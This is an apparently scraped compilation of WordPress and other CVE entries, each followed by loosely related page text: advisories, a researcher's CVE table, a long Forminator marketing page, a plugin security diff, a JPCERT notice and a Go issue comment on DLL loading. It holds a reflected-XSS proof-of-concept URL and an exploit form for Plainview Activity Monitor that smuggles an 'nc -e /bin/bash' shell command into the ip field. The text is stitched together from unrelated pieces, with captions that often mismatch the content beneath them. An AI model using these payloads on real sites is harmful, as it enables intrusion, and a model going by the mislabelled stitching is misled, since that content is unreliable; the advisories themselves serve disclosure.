The wp-google-maps plugin before 7.10.43 for WordPress has XSS via the wp-admin/admin.php PATH_INFO.

*   Vulnerability: XSS
*   Affected Software: wpGoogleMaps (400,000+ active installations)
*   Affected Version: 7.10.41
*   Patched Version: 7.10.43
*   Risk: Medium
*   Vendor Contacted: 10/25/2018
*   Vendor Fix: 10/31/2018
*   Public Disclosure: 02/05/2019

**CVSS**

6.1 Medium CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

**Details**

The wpGoogleMaps WordPress plugin is vulnerable to reflected XSS as it echoes PHP\_SELF without proper encoding.

Successful exploitation allows an attacker to execute JavaScript in the context of the application in the name of an attacked user. This in turn enables an attacker to bypass CSRF protection and thus perform any actions the legitimate user can perform, as well as read data which the user can access.

**Proof of Concept**

    http://192.168.0.103/wordpress/wp-admin/admin.php/'"><img src=x onerror=alert(1)>?page=wp-google-maps-menu&action=foo
    

**Code**

    wp-google-maps/wpGoogleMaps.php                          
    <input type='hidden' name='http_referer' value='".$_SERVER['PHP_SELF']."' />
    

**Timeline**

*   10/25/2018 Sent advisory
*   10/25/2018 Vendor confirms and releases fix
*   10/25/2018 Suggested improvement for fix
*   10/31/2018 Vendor releases improved fix
*   02/05/2019 Disclosure

CVE-2019-9912: wpGoogleMaps 7.10.41 - Reflected XSS (WordPress Plugin)

An authenticated shell command injection issue has been discovered in Raisecom ISCOM HT803G-U, HT803G-W, HT803G-1GE, and HT803G GPON products with the firmware version ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below, The values of the newpass and confpass parameters in /bin/WebMGR are used in a system call in the firmware. Because there is no user input validation, this leads to authenticated code execution on the device.

This website will mainly for manageing advisories which i create on day to day basis and for My CVE Database.

CVE ID

VENDOR

ISSUE

Reference

CVE-2015-1437

ASUS

XSS In Asus Router

https://nvd.nist.gov/vuln/detail/CVE-2015-1437

CVE-2015-1614

WordPress

XSRF(CSRF+XSS)

https://nvd.nist.gov/vuln/detail/CVE-2015-1614

CVE-2015-2755

WordPress

XSS / CSRF

https://nvd.nist.gov/vuln/detail/CVE-2015-2755

CVE-2016-9259

Tenable

Nessus XSS

https://www.tenable.com/security/tns-2016-17

CVE-2016-9261

Tenable

LCE XSS

https://www.tenable.com/security/tns-2016-18

CVE-2016-7103

Tenable

Security Centre XSS

https://www.tenable.com/security/tns-2016-19

CVE-2016-7103

Tenable

PVS XSS

https://www.tenable.com/security/tns-2016-20

CVE-2018-19524

Skyworth

Stack Overflow in Gpon Devices

https://s3curityb3ast.github.io/KSA-Dev-001.md

CVE-2018-19525

Systorme

Account takeover

https://s3curityb3ast.github.io/KSA-Dev-002.md

CVE-2019-7383

Systorme

RCE via shell upload

https://s3curityb3ast.github.io/KSA-Dev-003.md

CVE-2019-7387

Systorme

LFI

https://s3curityb3ast.github.io/KSA-Dev-004.md

CVE-2019-7384

Raisecom

Auth RCE

https://s3curityb3ast.github.io/KSA-Dev-005.md

CVE-2019-7385

Raisecom

Auth RCE

https://s3curityb3ast.github.io/KSA-Dev-006.md

CVE-2019-7386

NOKIA & HDM & KAI

Buffer overflow

https://s3curityb3ast.github.io/KSA-Dev-007.md

CVE-2020-21884

UniBox

XSRF

https://s3curityb3ast.github.io/KSA-Dev-008.txt

CVE-2020-21883

Unibox

Auth RCE

https://s3curityb3ast.github.io/KSA-Dev-009.txt

CVE-2021-3275

TP Link

Unauth-XSRF

https://s3curityb3ast.github.io/KSA-Dev-010.md

CVE-2021-25326

Skyworth

Info\_Disc

https://s3curityb3ast.github.io/KSA-Dev-012.txt

CVE-2021-25327

Skyworth

XSRF

https://s3curityb3ast.github.io/KSA-Dev-011.txt

CVE-2021-25328

Skyworth

Auth-RCE

https://s3curityb3ast.github.io/KSA-Dev-010.txt

CVE-2019-7385: Welcome to Kaustubh security advisories

Cross-site request forgery (CSRF) vulnerability in Smart Forms 2.6.15 and earlier allows remote attackers to hijack the authentication of administrators via a specially crafted page.

CVE-2019-5924: Smart Forms – when you need more than just a contact form

The "Forminator Contact Form, Poll & Quiz Builder" plugin before 1.6 for WordPress has XSS via a custom input field of a poll.

_Not your typical form-making plugin. Forminator is the easy-to-use WordPress form builder plugin for every website and situation. It’s the easiest way to create any form – contact form, order form, payment form, email form, feedback widgets, interactive polls with real-time results, buzzfeed-style “no wrong answer” quizzes, service estimators, and registration forms with payment options including PayPal and Stripe._

It’s the magical WordPress form builder for, well, everyone!

Forminator’s drag and drop visual builder makes it easy to setup and add forms to your WordPress website. Collect information, make your content interactive and generate more conversions with Forminator.

**Forminator Forms, Surveys, Quizzes, Polls, Calculations and More…**

*   Forms – Custom forms for all your needs with as many fields as you like.
*   Polls – Interactive polls to collect users opinions, with lots of dynamic options and settings.
*   Quizzes – Fun or challenging quizzes for your visitors to take and share on social media.
*   Calculations – Collect information, generate leads, take orders, and engage visitors.
*   Payments – Take payments, donations, down payments, sell merch with the included Stripe and PayPal integrations.

**Learn The Ropes With These Hands-On Forminator Tutorials**

*   Creating the Perfect Contact Form with Forminator
*   Create an Easy Payment Form (for free!) with Forminator
*   How to Get the Most Out of Using Forminator
*   How To Capture eSignatures Using Forminator
*   How To Collect Emails and Generate Leads With a Forminator Quiz

**Accept Payments With Stripe and PayPal**

Start taking payments with Forminator. No Pro upgrade required! SCA compliant Stripe and PayPal come included. Just enter your publish keys to activate the Forminator payment module for both fixed and variable payments. Check out how it works in the video below:

**Stripe Verified Partner**

Forminator is also proud to be a Stripe Verified Partner. This partnership allows us to help you get the most out of our Stripe integration thanks to additional resources, e.g. the ability to escalate support questions, or request custom pricing reviews.

**Calculations are a Lead Magnet**

There are literally thousands of combinations for adding value to your site with Calculations:

*   Registration forms with upgrade packages
*   Sell a tee shirt with size, color, price, and tax variations
*   Add a BMI and/or calorie intake calculator to your health and fitness blog
*   Embed a loan calculator into your finance site
*   Give a midwife a due date calculator
*   Insta-quote or service estimator
*   Put an ROI calculator on your agency site
*   And on, and on, and on…

**Drag and Drop Form Blocks**

Forminator has a bunch of drag and drop blocks that make it easy to put forms together – name, email, phone number, text, file upload, website, date, time, number, HTML, pagination, radio boxes, GDPR-friendly opt-ins, payments, calculations, and hidden field.

**Your Favorite Integrations Including +1000 Apps Already Added**

Forminator comes stacked with crowd favorite third-party integrations – email services, CRM, storage, and project managers.

*   HubSpot
*   Campaign Monitor
*   ActiveCampaign
*   Google Sheets
*   Webhooks (Zapier, Make, Tray, etc)
*   Trello
*   MailChimp
*   AWeber
*   Slack

**Develop And Sell Your Own Extensions**

Forminator is free and open to millions of WordPress users! Use the developer API and the included hooks and filters to build your own integrations or custom apps and sell them or give them away free here on WordPress.org.

**Poll Your Visitors**

Polls are a brilliant way to engage visitors. Forminator gives real-time feedback with live stats displayed in beautiful pie charts and graphs.

**Your Own Facebook-Style Quizzes**

Who hasn’t been roped into taking “IQ tests” and “figure out which Star Wars character you are” quizzes on Facebook? Now you can run all that traffic to your site. Create both knowledge and no wrong answer quizzes with Forminator.

**Collect Leads With Your Quizzes**

Looking to use your quizzes for more than just entertainment and a way to engage your audience? Forminator also allows you to collect participants’ details (e.g., name, email, etc.) by integrating a lead generation form in your quiz. See how it works below:

**Gutenberg Block**

Forminator’s got you, whether you’re a classic editor or Gutenberg early adapter. Say goodbye to shortcodes and quickly add forms to posts with the Forminator block for Gutenberg.

**Email Routing and Pre-Populate**

Make your site more efficient from visitor input to email response times. Use query strings to pre-fill your visitor information and deliver forms direct to specific teams with email routing, auto-response and conditions.

**User Front End Post Submissions**

Want to let your visitors share a post submission without needing access to the WordPress dashboard? With Forminator visitors can submit post ideas from the front end of your site so you can easily curate and publish their thoughts. Assign post to a default author, save to draft, publish immediately, etc.

**Google reCAPTCHA**

You don’t want your inbox flooded with a bunch of form spam. Google ReCAPTCHA is free with Forminator. Now you can stop the crazy bots without making it hard on your visitors. No more hard to read random phrases.

**Collect, Track and GDPR Ready**

Forminator stores and organizes submissions so you can sort, analyze and manage responses – of course, all while making it super easy to comply with the GDPR and other legal privacy policies.

**Import Your Existing Contact Form 7 Data**

Looking to move existing forms over from CF7? Forminator’s Import Wizard allows you to migrate all, or selected forms in a matter of clicks. You can also transfer data from a range of Contact Form 7 add-ons and settings.

**Custom Login and Registration Forms**

Create and embed custom login and registration forms for your sites (or multisites!). Take L&R forms to the next level: choose from a range of form fields, and customize settings, style, and behavior. Learn more in the video below:

**Multi-file Upload Field**

Along with enabling single file uploads, Forminator takes things up a notch by allowing users to upload multiple files. You can also choose to set specific file types, limit the number of files that can be uploaded, as well as the individual file size. The upload field’s drag and drop interface also makes it a breeze for users to upload files.

**Group And Repeat Form Fields**

The Field Group feature allows you to group any number of fields together in one form. You can also enable users to add as many additional field groups as needed when filling out your form. Great for repeatable data entry such as employment history, event attendees, lists, etc.

**Advanced Date Field Restrictions**

Perfect for appointment and hotel bookings – Forminator’s Date Picker Limits feature allows you to restrict the available dates shown on your date field calendar. For example, you might show future dates only, a selected number of dates from today, dates between a specific date range, specific days of the week, and more!

**Add An E-Signature Form Field (Pro Only)\***

Have an online application that requires a signature, or a contract you need your customers to sign? Forminator’s E-signature feature allows visitors to use their mouse, trackpad, or finger (on touch devices) to leave a signature upon submitting the form. Just insert the “E-Signature” field and voila!

**Receive Subscriptions and Recurring Payments on Stripe (Pro Only)\***

Create fully-customized subscription forms with Forminator Pro’s Stripe Subscription add-on. Allow your customers to choose plans/pricing, billing cycle, custom upsells, a free trial option, and of course, make secure card payments. Forminator also saves you time by instantly and automatically syncing all subscription form data straight to your Stripe account.

\***Note:** These features are only available with Forminator Pro. Get instant access to Forminator Pro – as well as all our other premium plugins, managed WP hosting, our site management platform: The Hub, and 24/7 expert support – all with a WPMU DEV membership.

**What Do People Say About Forminator?**

★★★★★

> Amazing plugin, it really seems that only your imagination can limit its uses. Loads of features like taking payments, calendar, for free. Can’t believe everything I need is in there, it sparks creativity and makes it fun to work on a website. – araca

★★★★★

> This plugin has an excellent, well-thought-out, well-designed UI and offers everything I was looking for (and I think I’ve tried every serious competitor). – tvsmvp

★★★★★

> This plugin is the best free form builder by far! I have researched many but this is so easy to use… Try it. I am SURE you will LOVE IT. – johncarteroz

★★★★★

> Great interface design, super easy to use and great functionality. I don’t normally write reviews, but I loved it so much, I just had to this time! – istavridi

**Shameless Plug(ins)**

Love Forminator! WPMU DEV has some other awesome free plugins you should checkout.

*   Smush – Image Compression and Optimization
*   Hummingbird – Page Speed Optimization
*   Hustle – Pop-ups, Slide-ins and Email Opt-ins
*   SmartCrawl – SEO Optimizer
*   Defender – Security, Monitoring, and Hack Protection

**About Us**

WPMU DEV is a premium supplier of quality WordPress plugins, services and support. Join here:  
https://wpmudev.com/

Don’t forget to stay up to date on everything WordPress from the Internet’s number one resource:  
WPMU DEV Blog

Hey, one more thing… we hope you enjoy our free offerings as much as we’ve loved making them for you!

**Contact and Credits**

WPMU DEV

CVE-2019-9567: Forminator – Contact Form, Payment Form & Custom Form Builder

The Plainview Activity Monitor plugin before 20180826 for WordPress is vulnerable to OS command injection via shell metacharacters in the ip parameter of a wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools request.

<html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
          <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
          <input type="hidden" name="lookup" value="Lookup" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

CVE-2018-15877: Offensive Security’s Exploit Database Archive

The WP Live Chat Support plugin before 8.0.06 for WordPress has stored XSS via the Name field.

CVE-2018-9864

admin/partials/wp-splashing-admin-main.php in the Splashing Images plugin (wp-splashing-images) before 2.1.1 for WordPress allows authenticated (administrator, editor, or author) remote attackers to conduct PHP Object Injection attacks via crafted serialized data in the 'session' HTTP GET parameter to wp-admin/upload.php.

Timestamp:

01/22/2018 07:29:38 PM (5 years ago)

janhenckens

Message:

Security update  

Location:

wp-splashing-images/trunk

Files:

  

*   README.txt (2 diffs)
*   admin/partials/wp-splashing-admin-main.php (1 diff)
*   admin/partials/wp-splashing-admin-sidebar.php (1 diff)
*   wp-splashing-images.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **wp-splashing-images/trunk/README.txt**
    
    r1799926
    
    r1807349
    
     
    
    5
    
    5
    
    Requires at least: 4.0
    
    6
    
    6
    
    Tested up to: 4.9.1
    
    7
    
     
    
    Stable tag: 2.1.0
    
     
    
    7
    
    Stable tag: 2.1.1
    
    8
    
    8
    
    License: GPLv2 or later
    
    9
    
    9
    
    License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    33
    
    33
    
    \== Changelog ==
    
    34
    
    34
    
     
    
    35
    
    \= 2.1.1 =
    
     
    
    36
    
    \* Fixed 2 security issues
    
     
    
    37
    
    35
    
    38
    
    \= 2.1 =
    
    36
    
    39
    
    \* Updated unsplash library and use the new download function
    
*   **wp-splashing-images/trunk/admin/partials/wp-splashing-admin-main.php**
    
    r1799926
    
    r1807349
    
     
    
    20
    
    20
    
        </h1>
    
    21
    
    21
    
            <?php if($\_GET\['session'\]) {
    
    22
    
     
    
    23
    
     
    
                $data = unserialize(base64\_decode($\_GET\['session'\]));
    
     
    
    22
    
                $data = unserialize(base64\_decode($\_GET\['session'\]), \['allowed\_classes' => false\]);
    
    24
    
    23
    
                $this->unsplash->saveTokens($data\['token'\]);
    
    25
    
    24
    
                $user = $this->unsplash->getUser(); ?>
    
*   **wp-splashing-images/trunk/admin/partials/wp-splashing-admin-sidebar.php**
    
    r1675965
    
    r1807349
    
     
    
    7
    
    7
    
                    <form id="splashing-search" method="get" action="<?php echo esc\_url(admin\_url('admin-post.php')); ?>">
    
    8
    
    8
    
                        <label class="screen-reader-text" for="post-search-input">Search Posts:</label>
    
    9
    
     
    
                        <input type="search" id="post-search-input-splashing" name="search" value="<?php echo $\_GET\['search'\]; ?>" placeholder="<?php \_e('Search unsplash.com', 'wp-splashing-images'); ?>">
    
     
    
    9
    
                        <input type="search" id="post-search-input-splashing" name="search" value="<?php echo sanitize\_title\_for\_query($\_GET\['search'\]); ?>" placeholder="<?php \_e('Search unsplash.com', 'wp-splashing-images'); ?>">
    
    10
    
    10
    
                        <input type="hidden" name="action" value="wp\_splashing\_search">
    
    11
    
    11
    
                        <input type="hidden" name="paged" value="1">
    
*   **wp-splashing-images/trunk/wp-splashing-images.php**
    
    r1799926
    
    r1807349
    
     
    
    17
    
    17
    
     \* Plugin URI:        http://studioespresso.co
    
    18
    
    18
    
     \* Description:       Unsplash.com), right in your dashboard. Add photos with one click and use them in your content right away.
    
    19
    
     
    
     \* Version:           2.1.0
    
     
    
    19
    
     \* Version:           2.1.1
    
    20
    
    20
    
     \* Author:            Studio Espresso
    
    21
    
    21
    
     \* Author URI:        http://studioespresso.co
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2018-6195: Changeset 1807349 for wp-splashing-images – WordPress Plugin Repository

Cross-site scripting vulnerability in WP Live Chat Support prior to version 7.0.07 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

**Changeset view not shown**, since the total size (8.7 MB) exceeds 4.0 MB

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2017-2187: Changeset 1658232 – WordPress Plugin Repository

Cross-site scripting vulnerability in YOP Poll versions prior to 5.8.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

Published:2017/03/23  Last Updated:2017/03/23

**Overview**

The WordPress plugin "YOP Poll" contains a cross-site scripting vulnerability.

**Products Affected**

*   YOP Poll versions prior to 5.8.1

**Description**

The WordPress plugin "YOP Poll" contains a stored cross-site scripting (CWE-79) vulnerability.

**Impact**

An arbitrary script may be executed on the web browser of a user accessing the poll generated by the application.

**Solution**

**Update the plugin**  
Update the plugin according to the information provided by the developer.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

CVSS v3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Attack Vector(AV)

Physical (P)

Local (L)

Adjacent (A)

Network (N)

Attack Complexity(AC)

High (H)

Low (L)

Privileges Required(PR)

High (H)

Low (L)

None (N)

User Interaction(UI)

Required (R)

None (N)

Scope(S)

Unchanged (U)

Changed (C)

Confidentiality Impact(C)

None (N)

Low (L)

High (H)

Integrity Impact(I)

None (N)

Low (L)

High (H)

Availability Impact(A)

None (N)

Low (L)

High (H)

CVSS v2 AV:N/AC:L/Au:S/C:N/I:P/A:N

Access Vector(AV)

Local (L)

Adjacent Network (A)

Network (N)

Access Complexity(AC)

High (H)

Medium (M)

Low (L)

Authentication(Au)

Multiple (M)

Single (S)

None (N)

Confidentiality Impact(C)

None (N)

Partial (P)

Complete (C)

Integrity Impact(I)

None (N)

Partial (P)

Complete (C)

Availability Impact(A)

None (N)

Partial (P)

Complete (C)

**Credit**

Sho Ueshima, Takashi Honda, Tsuyoshi Ogawa and Minaho Umehara of SIE Co.,Ltd. reported this vulnerability to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

CVE-2017-2127: WordPress plugin "YOP Poll" vulnerable to cross-site scripting

Untrusted search path vulnerability in Go before 1.5.4 and 1.6.x before 1.6.1 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory, related to use of the LoadLibrary function.

Here is one of many programs I use on my PC.

    C:\Program Files (x86)\Git\bin>objdump -p git.exe | grep Load
    LoaderFlags             00000000
    Entry a 00000000 00000000 Load Configuration Directory
            19cc7c    524  LoadLibraryA     7dd7499f
    
    C:\Program Files (x86)\Git\bin>dir *.dll
     Volume in drive C has no label.
     Volume Serial Number is F0C8-6DFE
    
     Directory of C:\Program Files (x86)\Git\bin
    
    07/12/2014  06:01 PM         1,154,665 libapr-0-0.dll
    07/12/2014  06:01 PM           992,438 libaprutil-0-0.dll
    07/12/2014  06:01 PM         1,724,229 libcrypto.dll
    07/12/2014  06:01 PM           360,448 libcurl.dll
    07/12/2014  06:01 PM           958,945 libexpat-0.dll
    07/12/2014  06:01 PM           443,550 libgsasl-7.dll
    07/12/2014  06:01 PM         1,241,889 libiconv-2.dll
    07/12/2014  06:01 PM           293,380 libintl-8.dll
    07/12/2014  06:01 PM         2,076,008 libneon-25.dll
    07/12/2014  06:01 PM         4,884,531 libpoppler-7.dll
    07/12/2014  06:01 PM           391,048 libssl.dll
    07/12/2014  06:01 PM         1,218,359 libsvn_client-1-0.dll
    07/12/2014  06:01 PM           851,272 libsvn_delta-1-0.dll
    07/12/2014  06:01 PM           798,881 libsvn_diff-1-0.dll
    07/12/2014  06:01 PM           792,459 libsvn_fs-1-0.dll
    07/12/2014  06:01 PM         1,028,321 libsvn_fs_fs-1-0.dll
    07/12/2014  06:01 PM           759,216 libsvn_ra-1-0.dll
    07/12/2014  06:01 PM         1,017,784 libsvn_ra_dav-1-0.dll
    07/12/2014  06:01 PM           800,669 libsvn_ra_local-1-0.dll
    07/12/2014  06:01 PM           930,046 libsvn_ra_svn-1-0.dll
    07/12/2014  06:01 PM         1,055,893 libsvn_repos-1-0.dll
    07/12/2014  06:01 PM         1,248,729 libsvn_subr-1-0.dll
    07/12/2014  06:01 PM           864,473 libsvn_swig_perl-1-0.dll
    07/12/2014  06:01 PM         1,253,965 libsvn_wc-1-0.dll
    07/12/2014  06:01 PM           812,063 libW11.dll
    07/12/2014  06:01 PM           194,947 libz.dll
    07/12/2014  06:01 PM           777,544 msys-1.0.dll
    07/12/2014  06:01 PM         1,282,560 msys-crypto-1.0.0.dll
    07/12/2014  06:01 PM            19,968 msys-minires.dll
    07/12/2014  06:01 PM           939,520 msys-perl5_8.dll
    07/12/2014  06:01 PM            82,852 msys-regex-1.dll
    07/12/2014  06:01 PM           328,192 msys-ssl-1.0.0.dll
    07/12/2014  06:01 PM            91,792 msys-z.dll
    07/12/2014  06:01 PM            52,064 msysltdl-3.dll
    07/12/2014  06:01 PM            65,124 pthreadGC2.dll
    07/12/2014  06:01 PM         1,152,701 tcl85.dll
    07/12/2014  06:01 PM            30,023 tclpip85.dll
    07/12/2014  06:01 PM         1,410,875 tk85.dll
                  38 File(s)     34,381,423 bytes
                   0 Dir(s)  94,420,832,256 bytes free
    
    C:\Program Files (x86)\Git\bin>
    

Just to demonstrate that behaviour you're about to break is actually used by some products.

> See the top comment in this bug: "2) Add a LoadLibraryEx to x/sys/win so that users can still get at the old behavior if they want it (by appropriate passing of flags)."
> 
> (A flags of 0 would mean the current behavior)

But that will still break my existing code. I don't personally have problem like described in https://textplain.wordpress.com/2015/12/18/dll-hijacking-just-wont-die/. Why should I suffer? Why cannot we do what I suggested above? What is the downside?

Alex

Tag

#wordpress